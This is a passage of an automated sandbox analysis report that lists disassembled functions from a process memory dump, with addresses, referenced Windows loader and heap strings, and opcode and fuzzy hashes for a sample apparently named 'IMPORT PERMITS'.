                                                                                                                                • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                                • API String ID: 0-2968386058
                                                                                                                                • Opcode ID: 5b6f4fe4030e7293161df8c1f7f849f39e5afd52e65d815e09c85376d6934784
                                                                                                                                • Instruction ID: 1acc484900717c63ed70b58a936029bb59453176948e35284f56de5079ff8f0a
                                                                                                                                • Opcode Fuzzy Hash: 5b6f4fe4030e7293161df8c1f7f849f39e5afd52e65d815e09c85376d6934784
                                                                                                                                • Instruction Fuzzy Hash: 47417272E00219EFDF11DFD9C891FEEBBB8AB14704F1440ABE609A72A0D7749A458B50
                                                                                                                                Function 01474144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                                • API String ID: 0-1373925480
                                                                                                                                • Opcode ID: b61a650641ea58191d4788fb3127f1c222eeea0f5ae86ae69e68e5a99562d5de
                                                                                                                                • Instruction ID: 86cd557f591e6e895bf6994f912ced2592bddd37239fc54e70127df7b0433c6d
                                                                                                                                • Opcode Fuzzy Hash: b61a650641ea58191d4788fb3127f1c222eeea0f5ae86ae69e68e5a99562d5de
                                                                                                                                • Instruction Fuzzy Hash: 7D411331A042598BEB26DBD9D844BFEBBB8FF65384F18045BD901EB7A1D7348901CB11
                                                                                                                                Function 01464755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01464888
                                                                                                                                • minkernel\ntdll\ldrredirect.c, xrefs: 01464899
                                                                                                                                • LdrpCheckRedirection, xrefs: 0146488F
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                • API String ID: 0-3154609507
                                                                                                                                • Opcode ID: 4d275aa3f16aef72eb42c641ed67fd63dfe75813fea9153894f70e75700217c0
                                                                                                                                • Instruction ID: c3dcae3cfa6cc91b09825aed295552ca37a38f38fb1539b251e32954fff8056a
                                                                                                                                • Opcode Fuzzy Hash: 4d275aa3f16aef72eb42c641ed67fd63dfe75813fea9153894f70e75700217c0
                                                                                                                                • Instruction Fuzzy Hash: 2C41D236A053518BCF21CE69D940A27BBE8EF89A58B0A015FED48D7371D730D800CB82
                                                                                                                                Function 013F0BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                • API String ID: 0-2558761708
                                                                                                                                • Opcode ID: 60b8af5594a4d52e192dbd3632246c13ab0103cbbaf6ecbc0e599034b0a62568
                                                                                                                                • Instruction ID: c8ddfa70f7d0f250a843ee9f372b5c8d75a3590d4ea61de9a73d09e97c50cdb9
                                                                                                                                • Opcode Fuzzy Hash: 60b8af5594a4d52e192dbd3632246c13ab0103cbbaf6ecbc0e599034b0a62568
                                                                                                                                • Instruction Fuzzy Hash: 7211CD313161469FEB2DCA1CD481B7AB3A6AF5161EF19816EF506CF662DB30DC41C750
                                                                                                                                Function 013F03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                • String ID: #%u
                                                                                                                                • API String ID: 48624451-232158463
                                                                                                                                • Opcode ID: 6f28c6b001b6683dd7cb1b5969eb7e45ff33846ce7c64e19c2a5df1d475c402f
                                                                                                                                • Instruction ID: fd138fb6bafe1a40d535d266e894718ed8ea71520053a9be196d735c6c709a9a
                                                                                                                                • Opcode Fuzzy Hash: 6f28c6b001b6683dd7cb1b5969eb7e45ff33846ce7c64e19c2a5df1d475c402f
                                                                                                                                • Instruction Fuzzy Hash: 6D716FB1A0010A9FDB05DF99C980FAEB7F8FF18304F15406AEA05E7261EA34ED41CB61
                                                                                                                                Function 013EA9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                • LdrResSearchResource Exit, xrefs: 013EAA25
                                                                                                                                • LdrResSearchResource Enter, xrefs: 013EAA13
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                                                • API String ID: 0-4066393604
                                                                                                                                • Opcode ID: c468aa01699ee5dd887906f8a2aa8ecfec7edae61a59dfbedc322983fdf891a6
                                                                                                                                • Instruction ID: 6d68fe987aa974c89959561fd462d892d29e29509f7a1a1d613f122deb914516
                                                                                                                                • Opcode Fuzzy Hash: c468aa01699ee5dd887906f8a2aa8ecfec7edae61a59dfbedc322983fdf891a6
                                                                                                                                • Instruction Fuzzy Hash: 41E19271E003299BFF22CF99D984BAEBBB9BF14718F10452AF901E72A1D7749941CB50
                                                                                                                                Function 014AA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: `$`
                                                                                                                                • API String ID: 0-197956300
                                                                                                                                • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                                • Instruction ID: a64ad2f6cfb048cd346a8799b229f5b815f74a7c47b831117f1e9da3c8e9aa85
                                                                                                                                • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                                • Instruction Fuzzy Hash: 5FC1E2312043429BE725CF29C840B6BBBE5EFE4318F694A2EF696CB2A0D774D505CB41
                                                                                                                                Function 0145E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID: Legacy$UEFI
                                                                                                                                • API String ID: 2994545307-634100481
                                                                                                                                • Opcode ID: e227bf3ae95a7fb0df9c2f455c88079d9447da53128799f18be9983742604d93
                                                                                                                                • Instruction ID: 392c60cc5833d20711cd87bdff0403a8dc5e9b71ad376eb1bb683e1447f50c12
                                                                                                                                • Opcode Fuzzy Hash: e227bf3ae95a7fb0df9c2f455c88079d9447da53128799f18be9983742604d93
                                                                                                                                • Instruction Fuzzy Hash: 35619D71E002199FDB54DFA9C940BAEFBB5FB48704F14406EEA49EB262D730EA40CB50
                                                                                                                                Function 014843D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: @$MUI
                                                                                                                                • API String ID: 0-17815947
                                                                                                                                • Opcode ID: 260cb34b48e61c348b46a7fff3794bb9a1416d60940997c4d298dd770efb1c7e
                                                                                                                                • Instruction ID: 7a0a4806a419065f23d6522021f0000343a0014651391f44edffea0448123d41
                                                                                                                                • Opcode Fuzzy Hash: 260cb34b48e61c348b46a7fff3794bb9a1416d60940997c4d298dd770efb1c7e
                                                                                                                                • Instruction Fuzzy Hash: EB512771E0021EAEDF11DFA9CC90FEFBBB8EB54754F14052AE611B72A0D6709A45CB60
                                                                                                                                Function 013E04E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 013E063D
                                                                                                                                • kLsE, xrefs: 013E0540
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                • API String ID: 0-2547482624
                                                                                                                                • Opcode ID: 492cf5a99d954a6092e3eeb30311b7920b4d19f20dc937ae08e32cc13e4244d7
                                                                                                                                • Instruction ID: 231aab6f72b1b5075cf2f366037056cd3b114706bfb1128eb7454a10a8ec2fb0
                                                                                                                                • Opcode Fuzzy Hash: 492cf5a99d954a6092e3eeb30311b7920b4d19f20dc937ae08e32cc13e4244d7
                                                                                                                                • Instruction Fuzzy Hash: DB51AE716047529BD728EF69C4887A7BBE4EF84318F10483EE6E987281E7B09545CF91
                                                                                                                                Function 013EA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                • RtlpResUltimateFallbackInfo Enter, xrefs: 013EA2FB
                                                                                                                                • RtlpResUltimateFallbackInfo Exit, xrefs: 013EA309
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                                • API String ID: 0-2876891731
                                                                                                                                • Opcode ID: b2492b55898feb2f173159e4a083c069c4f362c9330b822fa0cd8dc8e03f406f
                                                                                                                                • Instruction ID: ca337ab19634bb4e1bf37b1e4ae40abee626b0dd1db00ac38bcae234ccbc5204
                                                                                                                                • Opcode Fuzzy Hash: b2492b55898feb2f173159e4a083c069c4f362c9330b822fa0cd8dc8e03f406f
                                                                                                                                • Instruction Fuzzy Hash: 7441CD30A047A9DBEB12CF59D844B6ABBF4FF84308F1440AAE914DB7A1E3B5D900CB50
                                                                                                                                Function 0141A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID: Cleanup Group$Threadpool!
                                                                                                                                • API String ID: 2994545307-4008356553
                                                                                                                                • Opcode ID: b9bd335ad3ce1b411fcf77db3e8813895958806ad912bb4c18730fdd16c53b5b
                                                                                                                                • Instruction ID: fd9cbd4472f209282979bc51b473b36e01b569b495c4b66ff8a926f9292e6185
                                                                                                                                • Opcode Fuzzy Hash: b9bd335ad3ce1b411fcf77db3e8813895958806ad912bb4c18730fdd16c53b5b
                                                                                                                                • Instruction Fuzzy Hash: 3A01D1B2255740AFD311DF14CD45F2677E8E794729F05893AE68CC75A4E374E804CB46
                                                                                                                                Function 013EC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: MUI
                                                                                                                                • API String ID: 0-1339004836
                                                                                                                                • Opcode ID: 6daae28c16a667c2101e22de489122f25eae53b571436b80826050bf9f654de3
                                                                                                                                • Instruction ID: 6a4abb3e69e7b4b3937d0e8f692cbe4421b68f9ce955e1c2f8b94263657723dd
                                                                                                                                • Opcode Fuzzy Hash: 6daae28c16a667c2101e22de489122f25eae53b571436b80826050bf9f654de3
                                                                                                                                • Instruction Fuzzy Hash: 30825B75E003298BEB25CFA9C988BEDBBF5BF44318F148169E919AB291D7309D41CF50
                                                                                                                                Function 01466420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 0-3916222277
                                                                                                                                • Opcode ID: 776e58bd0055b033d3b3b362a1d0960cf8d55edd9d9005ac84948fd27f9fb8ba
                                                                                                                                • Instruction ID: b82708a91ed9b2d652c57953e8c4feba97e1969c7ad537626e927f14f6191819
                                                                                                                                • Opcode Fuzzy Hash: 776e58bd0055b033d3b3b362a1d0960cf8d55edd9d9005ac84948fd27f9fb8ba
                                                                                                                                • Instruction Fuzzy Hash: 14918671900219AFEB21DF95DD45FAFBBB8EF14754F11402AF604AB1A0D775AD00CB51
                                                                                                                                Function 0148E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 0-3916222277
                                                                                                                                • Opcode ID: a2ba62f5085df04d5dd2df7aa0e51b15c83ada05848d2c15d03fcdc34e45f4ec
                                                                                                                                • Instruction ID: 1d701c4ab82877bbda6341a5100698b95f7f52c444b362be52463a74449069c5
                                                                                                                                • Opcode Fuzzy Hash: a2ba62f5085df04d5dd2df7aa0e51b15c83ada05848d2c15d03fcdc34e45f4ec
                                                                                                                                • Instruction Fuzzy Hash: E291BF3190061ABEDB22AFA5DC44FEFBBB9EF55740F10002AF605A7260DB749942CB90
                                                                                                                                Function 0141A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: GlobalTags
                                                                                                                                • API String ID: 0-1106856819
                                                                                                                                • Opcode ID: faddba1d350a1077fa91d147e531531b967e27bdf0c2e35babeeea05811bb4fc
                                                                                                                                • Instruction ID: 2e634a90c67eb4ebecdaedb1294be366873a195de870107ac2eebd9fbbe36ea9
                                                                                                                                • Opcode Fuzzy Hash: faddba1d350a1077fa91d147e531531b967e27bdf0c2e35babeeea05811bb4fc
                                                                                                                                • Instruction Fuzzy Hash: 7E719FB5E0120A9FDF68DF9DC4906AEBBB1BF58710F55812FE805A7362E7308841CB60
                                                                                                                                Function 01484978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: .mui
                                                                                                                                • API String ID: 0-1199573805
                                                                                                                                • Opcode ID: 4f65a1feec7067e6a365532afb2d099873b9129c36b35c18c85541ced48bbf22
                                                                                                                                • Instruction ID: 743585d4bbfa5dc1f35d564cd19aea64524084c01ce9f707fb6d05a083c0c85a
                                                                                                                                • Opcode Fuzzy Hash: 4f65a1feec7067e6a365532afb2d099873b9129c36b35c18c85541ced48bbf22
                                                                                                                                • Instruction Fuzzy Hash: 91517672D00227DBDF11EF99D844BAEFBB4AF14A14F09412BEA11BB360D7749901CBA4
                                                                                                                                Function 013FE627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: EXT-
                                                                                                                                • API String ID: 0-1948896318
                                                                                                                                • Opcode ID: 270e226ab42330000d5f0045fcebe84384f365df45b5e1c5a6e5228cf329ce32
                                                                                                                                • Instruction ID: 4181e1d07dd22f9e925bc03538619fd7cf8605b894fef9eee868a00b71f21d49
                                                                                                                                • Opcode Fuzzy Hash: 270e226ab42330000d5f0045fcebe84384f365df45b5e1c5a6e5228cf329ce32
                                                                                                                                • Instruction Fuzzy Hash: CF41B2725083529BD710DA79C980B6BB7D8AF8871CF05093EF784E72A0E674D908C792
                                                                                                                                Function 0145C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: BinaryHash
                                                                                                                                • API String ID: 0-2202222882
                                                                                                                                • Opcode ID: b02dd7d98fd488ed2f049f3de4070ae6680b02bdcb774293e34fbb68ed1bc9c8
                                                                                                                                • Instruction ID: 91514ddc3e91ae128e3b7c327e8a938f243f208390c23634ca6a00c86c6cf413
                                                                                                                                • Opcode Fuzzy Hash: b02dd7d98fd488ed2f049f3de4070ae6680b02bdcb774293e34fbb68ed1bc9c8
                                                                                                                                • Instruction Fuzzy Hash: 7A4175B1D0022DAADB61DA50CC80FDEB77CAB55714F0045AAEA08AB151DB709E88CF94
                                                                                                                                Function 01476B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: #
                                                                                                                                • API String ID: 0-1885708031
                                                                                                                                • Opcode ID: 5c573ed5172ca71e9f160b1fe6d6cd3cc22a4e693d28d5672737f98b4640bd04
                                                                                                                                • Instruction ID: 30abbbbd74168361947b47ec171d85fb8283e842b4320752c7c3851b3fef538d
                                                                                                                                • Opcode Fuzzy Hash: 5c573ed5172ca71e9f160b1fe6d6cd3cc22a4e693d28d5672737f98b4640bd04
                                                                                                                                • Instruction Fuzzy Hash: F3312C31A00B199EFB32CB6DC850BEF7BAADF05304F15402EE940AB2A2D775D845CB50
                                                                                                                                Function 0145CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: BinaryName
                                                                                                                                • API String ID: 0-215506332
                                                                                                                                • Opcode ID: 0061088a13412d0b7f6664f622912ec82bba5bc3accb7acda80190e389298307
                                                                                                                                • Instruction ID: 8383adcde03c2360fd0e2420d7aa140e23c833fd0ac90429587b5a5569f70c26
                                                                                                                                • Opcode Fuzzy Hash: 0061088a13412d0b7f6664f622912ec82bba5bc3accb7acda80190e389298307
                                                                                                                                • Instruction Fuzzy Hash: F5310636900616AFEB15DB5DD895E7FBB78EF80720F01412AEE05A7262D7309E04DBE0
                                                                                                                                Function 014606F1 Relevance: 1.3, Strings: 1, Instructions: 79COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: x,
                                                                                                                                • API String ID: 0-2438440526
                                                                                                                                • Opcode ID: 18fc4b5b9239940257186c2a7997e1693973e0b7db4edf394b56500eae9bfb65
                                                                                                                                • Instruction ID: 347bdc173378826c6df7227c890e2972fee675bb50c9dae57de478f937df2f23
                                                                                                                                • Opcode Fuzzy Hash: 18fc4b5b9239940257186c2a7997e1693973e0b7db4edf394b56500eae9bfb65
                                                                                                                                • Instruction Fuzzy Hash: 0421A071900229DBCF24DF59C881ABEB7F8FF48744B51006AF941EB250D778AD42CBA1
                                                                                                                                Function 01460946 Relevance: 1.3, Strings: 1, Instructions: 70COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: x,
                                                                                                                                • API String ID: 0-2438440526
                                                                                                                                • Opcode ID: ede7fbed29d91585ccb3f20f99e82fa7d70780fd7cf3f8d39a6817e4e3e6c47a
                                                                                                                                • Instruction ID: 7a1477a887cf23fca545a2ef2a44565ba217b3ccaf6ae682d9dc162fba206ecb
                                                                                                                                • Opcode Fuzzy Hash: ede7fbed29d91585ccb3f20f99e82fa7d70780fd7cf3f8d39a6817e4e3e6c47a
                                                                                                                                • Instruction Fuzzy Hash: 0C2116B1E40209ABCB20CFAAD9809AEFBF9FF98704F10012FE405A7350DB709945CB51
                                                                                                                                Function 0146892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0146895E
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                                                • API String ID: 0-702105204
                                                                                                                                • Opcode ID: 0c6c695775efef107a55044e6bd00e36cdcffccaf68ad4f0d2022bcd899074fb
                                                                                                                                • Instruction ID: 68dd176bdc23be5cc17d8e011a45284cfc71fff10d4e9922dca4baed34e7de81
                                                                                                                                • Opcode Fuzzy Hash: 0c6c695775efef107a55044e6bd00e36cdcffccaf68ad4f0d2022bcd899074fb
                                                                                                                                • Instruction Fuzzy Hash: 1801F7322013139FEB305B5AD884A5B7B6DEF9565CB14042EF64106271CF706849CB93
                                                                                                                                Function 01482000 Relevance: .8, Instructions: 757COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 74680abe0bdd922efd25c93d2eecde9d5c425a3072a5d6d1218cd733ef6831eb
                                                                                                                                • Instruction ID: e641de4291f93574ec6598d9375fabac611e34c4a8a9d97b8d19cc45d64b09b9
                                                                                                                                • Opcode Fuzzy Hash: 74680abe0bdd922efd25c93d2eecde9d5c425a3072a5d6d1218cd733ef6831eb
                                                                                                                                • Instruction Fuzzy Hash: 6A42C4356083419BDB25EF69C890E6FBBE5AF94700F58092FFA8297360D7B0D845CB52
                                                                                                                                Function 01478158 Relevance: .6, Instructions: 617COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_13b0000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 1b36a99c32b9e664e879d70714c11d7ed9156b5be451188fc265cd6aa795ca6a
                                                                                                                                • Instruction ID: a67813f4d7baa9ab4147d9a5923e9a46ec896f14e2da7b9a71f9d6d0c9e95ac6
                                                                                                                                • Opcode Fuzzy Hash: 1b36a99c32b9e664e879d70714c11d7ed9156b5be451188fc265cd6aa795ca6a
                                                                                                                                • Instruction Fuzzy Hash: AF425C75E0021A9FEB25CF69C885BEEBBF5BF48300F15809AE949EB251D7349981CF50
                                                                                                                                Function 013F2840 Relevance: .6, Instructions: 605COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
